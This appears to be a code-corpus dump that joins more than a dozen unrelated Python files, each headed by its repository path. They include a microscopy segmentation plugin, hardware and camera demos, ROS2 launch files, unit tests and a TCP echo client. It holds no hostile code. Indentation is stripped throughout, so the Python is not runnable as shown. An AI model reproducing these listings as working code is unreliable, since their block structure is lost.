if myelin_mask_overlay is None:
return
if axon_mask_overlay is None:
return
# Extract the data from the overlays
myelin_array = myelin_mask_overlay[:, :, 0]
axon_array = axon_mask_overlay[:, :, 0]
# Perform the floodfill operation
axon_extracted_array = postprocessing.floodfill_axons(axon_array, myelin_array)
axon_corr_array = np.flipud(axon_extracted_array)
axon_corr_array = params.intensity['binary'] * np.rot90(axon_corr_array, k=1, axes=(1, 0))
file_name = self.ads_temp_dir / (myelin_mask_overlay.name[:-len("-myelin")] + "-axon-corr.png")
ads_utils.imwrite(filename=file_name, img=axon_corr_array)
self.load_png_image_from_path(file_name, is_mask=True, colormap="blue")
def on_compute_morphometrics_button(self, event):
"""
Compute morphometrics and save them to an Excel file.
"""
# Get pixel size
try:
pixel_size = self.pixel_size_float
except:
with wx.TextEntryDialog(
self, "Enter the pixel size in micrometer", value="0.07"
) as text_entry:
if text_entry.ShowModal() == wx.ID_CANCEL:
return
pixel_size_str = text_entry.GetValue()
pixel_size = float(pixel_size_str)
# Find the visible myelin and axon masks
axon_mask_overlay = self.get_corrected_axon_overlay()
if axon_mask_overlay is None:
axon_mask_overlay = self.get_visible_axon_overlay()
myelin_mask_overlay = self.get_visible_myelin_overlay()
if (axon_mask_overlay is None) or (myelin_mask_overlay is None):
return
# store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array = np.array(
myelin_mask_overlay[:, :, 0] * params.intensity['binary'], copy=True, dtype=np.uint8
)
myelin_array = np.flipud(myelin_array)
myelin_array = np.rot90(myelin_array, k=1, axes=(1, 0))
axon_array = np.array(
axon_mask_overlay[:, :, 0] * params.intensity['binary'], copy=True, dtype=np.uint8
)
axon_array = np.flipud(axon_array)
axon_array = np.rot90(axon_array, k=1, axes=(1, 0))
# Make sure the masks have the same size
if myelin_array.shape != axon_array.shape:
self.show_message("invalid visible masks dimensions")
return
# Save the arrays as PNG files
pred = (myelin_array // 2 + axon_array).astype(np.uint8)
pred_axon = pred > 200
pred_myelin = np.logical_and(pred >= 50, pred <= 200)
x = np.array([], dtype=[
('x0', 'f4'),
('y0', 'f4'),
('gratio','f4'),
('axon_area','f4'),
('axon_perimeter','f4'),
('myelin_area','f4'),
('axon_diam','f4'),
('myelin_thickness','f4'),
('axonmyelin_area','f4'),
('axonmyelin_perimeter','f4'),
('solidity','f4'),
('eccentricity','f4'),
('orientation','f4')
]
)
# Compute statistics
stats_array, index_image_array = compute_morphs.get_axon_morphometrics(im_axon=pred_axon, im_myelin=pred_myelin,
pixel_size=pixel_size,
axon_shape=self.settings.axon_shape,
return_index_image=True)
for stats in stats_array:
x = np.append(x,
np.array(
[(
stats['x0'],
stats['y0'],
stats['gratio'],
stats['axon_area'],
stats['axon_perimeter'],
stats['myelin_area'],
stats['axon_diam'],
stats['myelin_thickness'],
stats['axonmyelin_area'],
stats['axonmyelin_perimeter'],
stats['solidity'],
stats['eccentricity'],
stats['orientation']
)],
dtype=x.dtype)
)
with wx.FileDialog(self, "Save morphometrics file", wildcard="Excel files (*.xlsx)|*.xlsx",
defaultFile="axon_morphometrics.xlsx", style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed their mind
# save the current contents in the file
pathname = fileDialog.GetPath()
if not (pathname.lower().endswith((".xlsx", ".csv"))): # If the user didn't add the extension, add it here
pathname = pathname + ".xlsx"
try:
# Export to excel
pd.DataFrame(x).to_excel(pathname)
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
# Generate and load the index image
original_image_name = (axon_mask_overlay.name).split("-axon")[0]
original_image_name = original_image_name.split("_seg")[0]
index_outfile = Path(pathname).parents[0] / (original_image_name + str(index_suffix))
ads_utils.imwrite(index_outfile, index_image_array)
self.load_png_image_from_path(index_outfile, is_mask=False, colormap="yellow")
# Generate the colored image with indexes
axon_array, myelin_array = postprocessing.remove_intersection(axon_array//255, myelin_array//255)
axonmyelin_image = axon_array * params.intensity["axon"] + myelin_array * params.intensity["myelin"]
axonmyelin_outfile = self.ads_temp_dir / axonmyelin_suffix
ads_utils.imwrite(axonmyelin_outfile, axonmyelin_image)
postprocessing.generate_and_save_colored_image_with_index_numbers(
filename= Path(pathname).parents[0] / (original_image_name + str(axonmyelin_index_suffix)),
axonmyelin_image_path= axonmyelin_outfile,
index_image_array=index_image_array
)
return
def get_watershed_segmentation(self, im_axon, im_myelin, return_centroids=False):
"""
Parts of this function were copied from the code found in this document :
https://github.com/neuropoly/axondeepseg/blob/master/AxonDeepSeg/morphometrics/compute_morphometrics.py
In the future, the referenced script should be modified in order to avoid repetition.
:param im_axon: the binary mask corresponding to axons
:type im_axon: ndarray
:param im_myelin: the binary mask corresponding to the myelin
:type im_myelin: ndarray
:param return_centroids: (optional) if this is set to true, the function will also return the centroids of the
axon objects as a list of tuples
:type return_centroids: bool
:return: the label corresponding to the axon+myelin objects
:rtype: ndarray
"""
# Label each axon object
im_axon_label = measure.label(im_axon)
# Measure properties for each axon object
axon_objects = measure.regionprops(im_axon_label)
# Deal with myelin mask
if im_myelin is not None:
# sum axon and myelin masks
im_axonmyelin = im_axon + im_myelin
# Compute distance between each pixel and the background. Note: this distance is calculated from the im_axon,
# note from the im_axonmyelin image, because we know that each axon object is already isolated, therefore the
# distance metric will be more useful for the watershed algorithm below.
distance = ndi.distance_transform_edt(im_axon)
# local_maxi = feature.peak_local_max(distance, indices=False, footprint=np.ones((31, 31)), labels=axonmyelin)
# Get axon centroid as int (not float) to be used as index
ind_centroid = (
[int(props.centroid[0]) for props in axon_objects],
[int(props.centroid[1]) for props in axon_objects],
)
# Create an image with axon centroids, which value corresponds to the value of the axon object
im_centroid = np.zeros_like(im_axon, dtype="uint16")
for i in range(len(ind_centroid[0])):
# Note: The value "i" corresponds to the label number of im_axon_label
im_centroid[ind_centroid[0][i], ind_centroid[1][i]] = i + 1
# Watershed segmentation of axonmyelin using distance map
im_axonmyelin_label = morphology.watershed(
-distance, im_centroid, mask=im_axonmyelin
)
if return_centroids is True:
return im_axonmyelin_label, ind_centroid
else:
return im_axonmyelin_label
def load_png_image_from_path(
self, image_path, is_mask=False, add_to_overlayList=True, colormap="greyscale"
):
"""
This function converts a 2D image into a NIfTI image and loads it as an overlay.
The parameter add_to_overlayList allows to display the overlay into FSLeyes.
:param image_path: The location of the image, including the name and the .extension
:type image_path: Path
:param is_mask: (optional) Whether or not this is a segmentation mask. It will be treated as a normal
image by default.
:type is_mask: bool
:param add_to_overlayList: (optional) Whether or not to add the image to the overlay list. If so, the image will
be displayed in the application. This parameter is True by default.
:type add_to_overlayList: bool
:param colormap: (optional) the colormap of image that will be displayed. This parameter is set to greyscale by
default.
:type colormap: string
:return: the FSLeyes overlay corresponding to the loaded image.
:rtype: overlay
"""
# Open the 2D image
img_png2D = ads_utils.imread(image_path)
if is_mask is True:
img_png2D = img_png2D // params.intensity['binary'] # Segmentation masks should be binary
# Flip the image on the Y axis so that the morphometrics file shows the right coordinates
img_png2D = np.flipud(img_png2D)
# Convert image data into a NIfTI image
# Note: PIL and NiBabel use different axis conventions, so some array manipulation has to be done.
img_NIfTI = nib.Nifti1Image(
np.rot90(img_png2D, k=1, axes=(1, 0)), np.eye(4)
)
# Save the NIfTI image in a temporary directory
img_name = image_path.stem
out_file = self.ads_temp_dir.__str__() + "/" + img_name + ".nii.gz"
nib.save(img_NIfTI, out_file)
# Load the NIfTI image as an overlay
img_overlay = ovLoad.loadOverlays(paths=[out_file], inmem=True, blocking=True)[
0
]
# Display the overlay
if add_to_overlayList is True:
self.overlayList.append(img_overlay)
opts = self.displayCtx.getOpts(img_overlay)
opts.cmap = colormap
return img_overlay
def get_visible_overlays(self):
"""
This function returns a list containing evey overlays that are visible on FSLeyes.
:return: The list of the visible overlays
:rtype: list
"""
visible_overlay_list = []
for an_overlay in self.overlayList:
an_overlay_display = self.displayCtx.getDisplay(an_overlay)
if an_overlay_display.enabled is True:
visible_overlay_list.append(an_overlay)
return visible_overlay_list
def get_visible_image_overlay(self):
"""
This function is used to find the active microscopy image. This image should be visible and should NOT have the
following keywords in its name : axon, myelin, Myelin, watershed, Watershed.
:return: The visible microscopy image
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
image_overlay = None
n_found_overlays = 0
if visible_overlay_list.__len__() is 0:
self.show_message("No overlays are displayed")
return None
if visible_overlay_list.__len__() is 1:
return visible_overlay_list[0]
for an_overlay in visible_overlay_list:
if (
("watershed" not in an_overlay.name)
and ("Watershed" not in an_overlay.name)
and (not an_overlay.name.endswith("-myelin"))
and (not an_overlay.name.endswith("-Myelin"))
and (not an_overlay.name.endswith("-Axon"))
and (not an_overlay.name.endswith("-axon"))
):
n_found_overlays = n_found_overlays + 1
image_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one microscopy image has been found")
return None
if n_found_overlays is 0:
self.show_message("No visible microscopy image has been found")
return None
return image_overlay
def get_visible_axon_overlay(self):
"""
This method finds the currently visible axon overlay
:return: The visible overlay that corresponds to the axon mask
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
axon_overlay = None
n_found_overlays = 0
if visible_overlay_list.__len__() is 0:
self.show_message("No overlays are displayed")
return None
for an_overlay in visible_overlay_list:
if (an_overlay.name.endswith("-axon")) or (an_overlay.name.endswith("-Axon")):
n_found_overlays = n_found_overlays + 1
axon_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one axon mask has been found")
return None
if n_found_overlays is 0:
self.show_message("No visible axon mask has been found")
return None
return axon_overlay
def get_corrected_axon_overlay(self):
"""
This method finds a the visible corrected axon overlay if it exists
:return: The visible corrected axon overlay
:rtype overlay
"""
visible_overlay_list = self.get_visible_overlays()
axon_overlay = None
n_found_overlays = 0
if visible_overlay_list.__len__() is 0:
self.show_message("No overlays are displayed")
return None
for an_overlay in visible_overlay_list:
if (an_overlay.name.endswith("-axon-corr")) or (an_overlay.name.endswith("-Axon-corr")):
n_found_overlays = n_found_overlays + 1
axon_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one corrected axon mask has been found")
return None
if n_found_overlays is 0:
return None
return axon_overlay
def get_visible_myelin_overlay(self):
"""
This method finds the currently visible myelin overlay
:return: The visible overlay that corresponds to the myelin mask
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
myelin_overlay = None
n_found_overlays = 0
if visible_overlay_list.__len__() is 0:
self.show_message("No overlays are displayed")
return None
for an_overlay in visible_overlay_list:
if (an_overlay.name.endswith("-myelin")) or (an_overlay.name.endswith("-Myelin")):
n_found_overlays = n_found_overlays + 1
myelin_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one myelin mask has been found")
return None
if n_found_overlays is 0:
self.show_message("No visible myelin mask has been found")
return None
return myelin_overlay
def show_message(self, message, caption="Error"):
"""
This function is used to show a popup message on the FSLeyes interface.
:param message: The message to be displayed.
:type message: String
:param caption: (Optional) The caption of the message box.
:type caption: String
"""
with wx.MessageDialog(
self,
message,
caption=caption,
style=wx.OK | wx.CENTRE,
pos=wx.DefaultPosition,
) as msg:
msg.ShowModal()
def verrify_version(self):
"""
This function checks if the plugin version is the same as the one in the AxonDeepSeg directory
"""
ads_path = Path(AxonDeepSeg.__file__).parents[0]
plugin_path_parts = ads_path.parts[:-1]
plugin_path = Path(*plugin_path_parts)
plugin_file = plugin_path / "ads_plugin.py"
# Check if the plugin file exists
plugin_file_exists = plugin_file.exists()
if plugin_file_exists is False:
return
# Check the version of the plugin
with open(plugin_file.__str__()) as plugin_file_reader:
plugin_file_lines = plugin_file_reader.readlines()
plugin_file_lines = [x.strip() for x in plugin_file_lines]
version_line = 'VERSION = "' + VERSION + '"'
plugin_is_up_to_date = True
version_found = False
for lines in plugin_file_lines:
if (lines.startswith("VERSION = ")):
version_found = True
if not (lines == version_line):
plugin_is_up_to_date = False
if (version_found is False) or (plugin_is_up_to_date is False):
message = (
"A more recent version of the AxonDeepSeg plugin was found in your AxonDeepSeg installation folder. "
"You will need to replace the current FSLeyes plugin which the new one. "
"To proceed, go to: file -> load plugin -> ads_plugin.py. Then, restart FSLeyes."
)
self.show_message(message, "Warning")
return
def get_citation(self):
"""
This function returns the AxonDeepSeg paper citation.
:return: The AxonDeepSeg citation
:rtype: string
"""
return (
"If you use this work in your research, please cite it as follows: \n"
"<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018). "
"AxonDeepSeg: automatic axon and myelin segmentation from microscopy data using convolutional "
"neural networks. Scientific Reports, 8(1), 3816. "
"Link to paper: https://doi.org/10.1038/s41598-018-22181-4. \n"
"Copyright (c) 2018 NeuroPoly (Polytechnique Montreal)"
)
def get_logo(self):
"""
This function finds the AxonDeepSeg logo saved as a png image and returns it as a wx bitmap image.
:return: The AxonDeepSeg logo
:rtype: wx.StaticBitmap
"""
ads_path = Path(AxonDeepSeg.__file__).parents[0]
logo_file = ads_path / "logo_ads-alpha_small.png"
png = wx.Image(str(logo_file), wx.BITMAP_TYPE_ANY).ConvertToBitmap()
png.SetSize((png.GetWidth(), png.GetHeight()))
logo_image = wx.StaticBitmap(
self, -1, png, wx.DefaultPosition, (png.GetWidth(), png.GetHeight())
)
return logo_image
@staticmethod
def supportedViews():
"""
I am not sure what this method does.
"""
from fsleyes.views.orthopanel import OrthoPanel
return [OrthoPanel]
@staticmethod
def defaultLayout():
"""
This method makes the control panel appear on the left of the FSLeyes window.
"""
return {"location": wx.LEFT}
|
examples/python/beat.py | eeryinkblot/psmoveapi | 306 | 12686902 |
#
# PS Move API - An interface for the PS Move Motion Controller
# Copyright (c) 2011 <NAME> <<EMAIL>>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""
Pulsating light demo
Press the Move button at the first beat, then press it again after 4 beats.
Watch the sphere glow up to the beat. Keep SQUARE pressed to let it glow up
every 2 beats. Keep TRIANGLE pressed to let it glow up every beat. Press the
Move button to reset, then start again (first beat, 4th beat, ...).
"""
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'build'))
import time
import math
import psmove
if psmove.count_connected() < 1:
print('No controller connected')
sys.exit(1)
move = psmove.PSMove()
move.set_rate_limiting(1)
if move.connection_type != psmove.Conn_Bluetooth:
print('Please connect controller via Bluetooth')
sys.exit(1)
current_beat = 0
old_buttons = 0
last_blink = 0
intensity = 0
divisor = 1
last_decrease = 0
while True:
while move.poll():
buttons = move.get_buttons()
if buttons & psmove.Btn_MOVE and not old_buttons & psmove.Btn_MOVE:
print time.time(), 'press'
if current_beat == 0:
print 'init'
current_beat = time.time()
elif current_beat < 10000:
print 'reset'
current_beat = 0
else:
print 'run!'
current_beat = time.time() - current_beat
last_blink = time.time()
if buttons & psmove.Btn_TRIANGLE:
divisor = 4
elif buttons & psmove.Btn_SQUARE:
divisor = 2
else:
divisor = 1
old_buttons = buttons
intensity *= .9999
if current_beat > 0 and current_beat < 10000:
if last_blink == 0 or last_blink + (current_beat/divisor) < time.time():
last_blink += current_beat/divisor
print current_beat, 'blink'
intensity = 255.
move.set_leds(*map(int, [intensity]*3))
move.update_leds()
|
Chapter07/question_5_example_code.py | trappn/Mastering-GUI-Programming-with-Python | 138 | 12686913 | <gh_stars>100-1000
from PyQt5 import QtWidgets as qtw
from PyQt5 import QtCore as qtc
from PyQt5 import QtMultimedia as qtmm
from PyQt5 import QtMultimediaWidgets as qtmmw
class MainWindow(qtw.QWidget):
def __init__(self):
super().__init__()
self.setLayout(qtw.QVBoxLayout())
# camera
self.camera = qtmm.QCamera()
# viewfinder
cvf = qtmmw.QCameraViewfinder()
self.camera.setViewfinder(cvf)
self.layout().addWidget(cvf)
# Form
form = qtw.QFormLayout()
self.layout().addLayout(form)
# zoom
zoomslider = qtw.QSlider(
minimum=1,
maximum=10,
sliderMoved=self.on_slider_moved,
orientation=qtc.Qt.Horizontal
)
form.addRow('Zoom', zoomslider)
self.camera.start()
self.show()
def on_slider_moved(self, value):
focus = self.camera.focus()
focus.zoomTo(1, value)
if __name__ == '__main__':
app = qtw.QApplication([])
mw = MainWindow()
app.exec()
|
binproperty/apps.py | wh8983298/GreaterWMS | 1,063 | 12686927 | <filename>binproperty/apps.py
from django.apps import AppConfig
from django.db.models.signals import post_migrate
class BinpropertyConfig(AppConfig):
name = 'binproperty'
def ready(self):
post_migrate.connect(do_init_data, sender=self)
def do_init_data(sender, **kwargs):
init_category()
def init_category():
"""
:return:None
"""
try:
from .models import ListModel as ls
if ls.objects.filter(openid__iexact='init_data').exists():
if ls.objects.filter(openid__iexact='init_data').count() != 4:
ls.objects.filter(openid__iexact='init_data').delete()
init_data = [
ls(id=1, openid='init_data', bin_property='Damage', creater='GreaterWMS'),
ls(id=2, openid='init_data', bin_property='Inspection', creater='GreaterWMS'),
ls(id=3, openid='init_data', bin_property='Normal', creater='GreaterWMS'),
ls(id=4, openid='init_data', bin_property='Holding', creater='GreaterWMS')
]
ls.objects.bulk_create(init_data, batch_size=100)
else:
init_data = [
ls(id=1, openid='init_data', bin_property='Damage', creater='GreaterWMS'),
ls(id=2, openid='init_data', bin_property='Inspection', creater='GreaterWMS'),
ls(id=3, openid='init_data', bin_property='Normal', creater='GreaterWMS'),
ls(id=4, openid='init_data', bin_property='Holding', creater='GreaterWMS')
]
ls.objects.bulk_create(init_data, batch_size=100)
except:
pass
|
samples/utilityimageformatconverter.py | matt-phair/pypylon | 358 | 12686933 | <reponame>matt-phair/pypylon<filename>samples/utilityimageformatconverter.py
# Note: Before getting started, Basler recommends reading the Programmer's Guide topic
# in the pylon C++ API documentation that gets installed with pylon.
# If you are upgrading to a higher major version of pylon, Basler also
# strongly recommends reading the Migration topic in the pylon C++ API documentation.
# This sample illustrates how to use the image format
# converter class CImageFormatConverter.
# The image format converter accepts all image formats
# produced by Basler camera devices and it is able to
# convert these to a number of output formats.
# The conversion can be controlled by several parameters.
# See the converter class documentation for more details.
from pypylon import pylon
from pypylon import genicam
# This is a helper function for showing an image on the screen if Windows is used,
# and for printing the first bytes of the image.
def show_image(image, message):
print(message)
pBytes = image.Array
print("Bytes of the image: \n")
print(pBytes)
try:
# Create the converter and set parameters.
converter = pylon.ImageFormatConverter()
converter.OutputPixelFormat = pylon.PixelType_Mono8
# Try to get a grab result for demonstration purposes.
print("Waiting for an image to be grabbed.")
try:
camera = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())
grabResult = camera.GrabOne(1000)
show_image(grabResult, "Grabbed image.")
targetImage = pylon.PylonImage.Create(pylon.PixelType_Mono8, grabResult.GetWidth(), grabResult.GetHeight());
print(converter.IsSupportedOutputFormat(pylon.PixelType_Mono8))
# Now we can check if conversion is required.
if converter.ImageHasDestinationFormat(grabResult):
# No conversion is needed. It can be skipped for saving processing
# time.
show_image(grabResult, "Grabbed image.")
else:
# Conversion is needed.
show_image(grabResult, "Grabbed image.")
show_image(targetImage, "Converted image.")
except genicam.GenericException as e:
print("Could not grab an image: ", e.GetDescription())
except genicam.GenericException as e:
print("An exception occurred. ", e.GetDescription())
|
tests/zoomus/components/live_stream/test_update.py | seantibor/zoomus | 178 | 12686934 | import unittest
from zoomus import components, util
import responses
def suite():
"""Define all the tests of the module."""
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(UpdateV2TestCase))
return suite
class UpdateV2TestCase(unittest.TestCase):
def setUp(self):
self.component = components.live_stream.LiveStreamComponentV2(
base_uri="http://foo.com",
config={
"api_key": "KEY",
"api_secret": "SECRET",
"version": util.API_VERSION_2,
},
)
@responses.activate
def test_can_update(self):
responses.add(responses.PATCH, "http://foo.com/meetings/42/livestream")
response = self.component.update(
meeting_id="42", stream_url="https://foo.bar", stream_key="12345"
)
self.assertEqual(
response.request.body,
'{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}',
)
@responses.activate
def test_can_update_wildcard(self):
responses.add(responses.PATCH, "http://foo.com/meetings/42/livestream")
data = {
"meeting_id": "42",
"stream_url": "https://foo.bar",
"stream_key": "12345",
}
response = self.component.update(**data)
self.assertEqual(
response.request.body,
'{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}',
)
def test_requires_meeting_id(self):
with self.assertRaises(ValueError) as context:
self.component.update()
self.assertEqual(context.exception.message, "'meeting_id' must be set")
if __name__ == "__main__":
unittest.main()
|
env/Lib/site-packages/OpenGL/raw/GLES2/EXT/render_snorm.py | 5gconnectedbike/Navio2 | 210 | 12686946 | <filename>env/Lib/site-packages/OpenGL/raw/GLES2/EXT/render_snorm.py
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_EXT_render_snorm'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_EXT_render_snorm',error_checker=_errors._error_checker)
GL_BYTE=_C('GL_BYTE',0x1400)
GL_R16_SNORM_EXT=_C('GL_R16_SNORM_EXT',0x8F98)
GL_R8_SNORM=_C('GL_R8_SNORM',0x8F94)
GL_RG16_SNORM_EXT=_C('GL_RG16_SNORM_EXT',0x8F99)
GL_RG8_SNORM=_C('GL_RG8_SNORM',0x8F95)
GL_RGBA16_SNORM_EXT=_C('GL_RGBA16_SNORM_EXT',0x8F9B)
GL_RGBA8_SNORM=_C('GL_RGBA8_SNORM',0x8F97)
GL_SHORT=_C('GL_SHORT',0x1402)
|
examples/GridEYE_test.py | timgates42/PyBBIO | 102 | 12686961 | """
GridEYE_test.py
<NAME> <<EMAIL>>
Example program for PyBBIO's GridEYE library.
This example program is in the public domain.
"""
from bbio import *
from bbio.libraries.GridEYE import GridEYE
# Initialize the I2C bus:
I2C1.open()
# Create a GridEYE object:
grideye = GridEYE(I2C1)
ambient = grideye.getAmbientTemp()
frame = grideye.getFrame()
print "ambient temp: {:0.1f}C".format(ambient)
print "sensor temp:"
for y in range(8):
string = ""
for x in range(8):
string += " {:5.1f}".format(frame[y*8+x])
print string |
webots_ros2_epuck/launch/robot_launch.py | zegangYang/webots_ros2 | 176 | 12686968 | <reponame>zegangYang/webots_ros2
#!/usr/bin/env python
# Copyright 1996-2021 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch Webots e-puck driver."""
import os
import pathlib
import launch
from launch.substitutions import LaunchConfiguration
from launch.actions import DeclareLaunchArgument
from launch.substitutions.path_join_substitution import PathJoinSubstitution
from launch_ros.actions import Node
from launch import LaunchDescription
from ament_index_python.packages import get_package_share_directory
from webots_ros2_driver.webots_launcher import WebotsLauncher
def generate_launch_description():
package_dir = get_package_share_directory('webots_ros2_epuck')
world = LaunchConfiguration('world')
robot_description = pathlib.Path(os.path.join(package_dir, 'resource', 'epuck_webots.urdf')).read_text()
ros2_control_params = os.path.join(package_dir, 'resource', 'ros2_control.yml')
use_sim_time = LaunchConfiguration('use_sim_time', default=True)
webots = WebotsLauncher(
world=PathJoinSubstitution([package_dir, 'worlds', world])
)
controller_manager_timeout = ['--controller-manager-timeout', '50']
controller_manager_prefix = 'python.exe' if os.name == 'nt' else ''
diffdrive_controller_spawner = Node(
package='controller_manager',
executable='spawner.py',
output='screen',
prefix=controller_manager_prefix,
arguments=['diffdrive_controller'] + controller_manager_timeout,
parameters=[
{'use_sim_time': use_sim_time},
],
)
joint_state_broadcaster_spawner = Node(
package='controller_manager',
executable='spawner.py',
output='screen',
prefix=controller_manager_prefix,
arguments=['joint_state_broadcaster'] + controller_manager_timeout,
parameters=[
{'use_sim_time': use_sim_time},
],
)
epuck_driver = Node(
package='webots_ros2_driver',
executable='driver',
output='screen',
parameters=[
{'robot_description': robot_description,
'use_sim_time': use_sim_time},
ros2_control_params
],
remappings=[
('/diffdrive_controller/cmd_vel_unstamped', '/cmd_vel'),
]
)
epuck_process = Node(
package='webots_ros2_epuck',
executable='epuck_node',
output='screen',
parameters=[
{'use_sim_time': use_sim_time},
],
)
robot_state_publisher = Node(
package='robot_state_publisher',
executable='robot_state_publisher',
output='screen',
parameters=[{
'robot_description': '<robot name=""><link name=""/></robot>'
}],
)
footprint_publisher = Node(
package='tf2_ros',
executable='static_transform_publisher',
output='screen',
arguments=['0', '0', '0', '0', '0', '0', 'base_link', 'base_footprint'],
)
return LaunchDescription([
DeclareLaunchArgument(
'world',
default_value='epuck_world.wbt',
description='Choose one of the world files from `/webots_ros2_epuck/world` directory'
),
joint_state_broadcaster_spawner,
diffdrive_controller_spawner,
webots,
robot_state_publisher,
epuck_driver,
footprint_publisher,
epuck_process,
# This action will kill all nodes once the Webots simulation has exited
launch.actions.RegisterEventHandler(
event_handler=launch.event_handlers.OnProcessExit(
target_action=webots,
on_exit=[launch.actions.EmitEvent(event=launch.events.Shutdown())],
)
)
])
|
eventsourcing/examples/aggregate8/application.py | bibz/eventsourcing | 107 | 12686994 | <filename>eventsourcing/examples/aggregate8/application.py
from typing import Any, Dict
from uuid import UUID
from eventsourcing.application import Application
from eventsourcing.examples.aggregate8.domainmodel import Dog, Snapshot
from eventsourcing.examples.aggregate8.persistence import (
OrjsonTranscoder,
PydanticMapper,
)
from eventsourcing.persistence import Mapper, Transcoder
class DogSchool(Application):
env = {
"AGGREGATE_CACHE_MAXSIZE": "50",
"DEEPCOPY_FROM_AGGREGATE_CACHE": "n",
"IS_SNAPSHOTTING_ENABLED": "y",
}
snapshot_class = Snapshot
def register_dog(self, name: str) -> UUID:
dog = Dog(name)
self.save(dog)
return dog.id
def add_trick(self, dog_id: UUID, trick: str) -> None:
dog: Dog = self.repository.get(dog_id)
dog.add_trick(trick)
self.save(dog)
def get_dog(self, dog_id: UUID) -> Dict[str, Any]:
dog: Dog = self.repository.get(dog_id)
return {"name": dog.name, "tricks": tuple(dog.tricks)}
def construct_mapper(self) -> Mapper:
return self.factory.mapper(
transcoder=self.construct_transcoder(),
mapper_class=PydanticMapper,
)
def construct_transcoder(self) -> Transcoder:
return OrjsonTranscoder()
|
Demo/Network/tcp-echo-client.py | zaklaus/Shrine | 1,227 | 12687031 | #!/usr/bin/env python3
import socket
import sys
HOST = sys.argv[1]
PORT = int(sys.argv[2])
MESSAGE = sys.argv[3]
with socket.create_connection((HOST, PORT)) as s:
s.sendall(MESSAGE.encode())
data = s.recv(1024)
if data:
print('Received', data.decode())
|
tests/keras_contrib/optimizers/ftml_test.py | congson1293/keras-contrib | 1,335 | 12687070 | from __future__ import print_function
import pytest
from keras_contrib.utils.test_utils import is_tf_keras
from keras_contrib.tests import optimizers
from keras_contrib.optimizers import ftml
@pytest.mark.xfail(is_tf_keras,
reason='TODO fix this.',
strict=True)
def test_ftml():
optimizers._test_optimizer(ftml())
optimizers._test_optimizer(ftml(lr=0.003, beta_1=0.8,
beta_2=0.9, epsilon=1e-5,
decay=1e-3))
|
examples/python/extras/test_o3d.py | JeremyBYU/polylidar | 149 | 12687071 | <gh_stars>100-1000
"""Demo of Open3D 0.10.0 Slowdown
Please modify DIRECTORY to point to the folder of meshes attached to this issue reply
"""
import os
import open3d as o3d
import copy
DIRECTORY = 'fixtures/o3d_slow_down'
# o3d 0.10.0 - 9 Seconds to load meshes (time to being user interation), 1 FPS (with draw edges enabled 'w')
# o3d 0.11.0+f1d478c4 - 0.5 seconds, 45-60 FPS (with draw edges)
duplicate = 50
def main():
all_meshes = []
all_files = sorted(list(os.listdir(DIRECTORY)))
for filename in all_files:
print(filename)
mesh = o3d.io.read_triangle_mesh(os.path.join(DIRECTORY, filename))
all_meshes.extend([ copy.deepcopy(mesh) for i in range(duplicate)])
print(len(all_meshes))
o3d.visualization.draw_geometries(all_meshes)
if __name__ == "__main__":
main() |
tests/test_ihex.py | CreativeLau/stcgal | 469 | 12687076 | #
# Copyright (c) 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
